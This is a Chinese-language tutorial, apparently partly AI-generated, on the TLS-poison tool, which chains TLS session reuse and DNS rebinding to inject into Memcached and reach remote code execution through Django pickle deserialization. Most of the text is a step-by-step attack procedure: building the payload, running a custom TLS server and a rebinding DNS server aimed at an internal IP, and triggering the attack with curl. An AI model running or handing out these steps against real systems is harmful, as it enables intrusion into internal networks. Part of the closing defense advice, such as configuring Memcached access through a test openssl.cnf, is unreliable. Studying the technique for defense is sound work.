TLS Poison实战案例:Memcached注入与远程代码执行演示

发布时间:2026/7/27 16:01:22

TLS Poison实战案例:Memcached注入与远程代码执行演示 TLS Poison实战案例Memcached注入与远程代码执行演示【免费下载链接】TLS-poison项目地址: https://gitcode.com/gh_mirrors/tl/TLS-poisonTLS Poison是一款利用TLS协议特性实现通用SSRF和CSRF攻击的工具其核心功能是通过TLS会话持久化技术在无需依赖特定解析器漏洞的情况下实现对本地或内部网络服务的攻击。本文将通过Memcached注入与远程代码执行案例详细演示TLS Poison的实战应用方法。什么是TLS Poison攻击TLS Poison攻击的原理类似于SNI注入但采用了更通用的TLS协议固有行为。其核心机制是通过TLS会话持久化和DNS重绑定技术组合诱导目标服务器建立TLS连接后将后续流量重定向到内部服务如Memcached、Redis等。这种攻击方式突破了传统gopher://协议的局限性可通过https://URL实现更广泛的攻击面。TLS Poison攻击原理示意图展示了TLS会话劫持与DNS重绑定的协同工作流程环境准备与依赖组件核心组件路径TLS服务器源码client-hello-poisoning/custom-tls/src/main.rsDNS重绑定服务器client-hello-poisoning/custom-dns/alternate-dns.pyMemcached注入工具client-hello-poisoning/minimal-django/set-cache.py安装依赖# 安装系统依赖 sudo apt install git redis python3 python3-pip # 克隆项目仓库 git clone https://gitcode.com/gh_mirrors/tl/TLS-poison # 安装Rust环境 curl --proto https --tlsv1.2 -sSf https://sh.rustup.rs | shMemcached注入攻击实战1. 构建恶意Payload使用项目提供的set-cache.py工具生成Memcached注入 payload该工具利用Django框架的Pickle反序列化漏洞实现远程代码执行# 生成打开计算器的PayloadmacOS示例 cd TLS-poison/client-hello-poisoning/minimal-django python3 set-cache.py open -a Calculator # 生成的payload.memcached文件需添加\r\n前缀后加载到Redis2. 配置TLS服务器编译并启动定制化TLS服务器监听Memcached默认端口11211cd ../custom-tls cargo build # 使用测试证书启动服务器指定Memcached端口和Payload target/debug/custom-tls -p 11211 --verbose \ --certs ../../rustls/test-ca/rsa/end.fullchain \ --key ../../rustls/test-ca/rsa/end.rsa http3. 配置DNS重绑定服务器在独立服务器上启动DNS重绑定服务实现域名解析交替返回TLS服务器IP和目标内网IPcd ../custom-dns pip3 install -r requirements.txt # 替换$DOMAIN为你的域名$TARGET_IP为目标内网IP通常是127.0.0.1 sudo python3 alternate-dns.py $DOMAIN,$TARGET_IP -b 0.0.0.0 -t $TLS_SERVER_IP -d 8.8.8.84. 实施攻击通过诱导目标服务器访问构造的HTTPS URL触发攻击# 目标服务器执行此命令将触发Memcached注入 curl -L https://tlstest.example.com:11211防御建议与最佳实践限制内部服务访问Memcached等服务应绑定到127.0.0.1而非公网接口可通过test-ca/openssl.cnf配置访问控制禁用不必要的TLS会话复用在服务端配置中减少会话超时时间实施网络分段隔离Web服务器与内部缓存服务的网络通信使用最新版TLS库项目依赖的rustls库已修复多个安全漏洞建议定期更新总结TLS Poison通过创新利用TLS协议特性为SSRF攻击提供了全新的思路。本文演示的Memcached注入案例只是其应用场景之一该工具还可用于攻击SMTP、Redis等多种内部服务。安全人员应充分认识这类攻击的危害性采取多层次防御措施保护内部网络安全。注意本文仅用于安全研究目的未经授权请勿对任何系统实施攻击。项目完整文档可参考README.md。【免费下载链接】TLS-poison项目地址: https://gitcode.com/gh_mirrors/tl/TLS-poison创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

相关新闻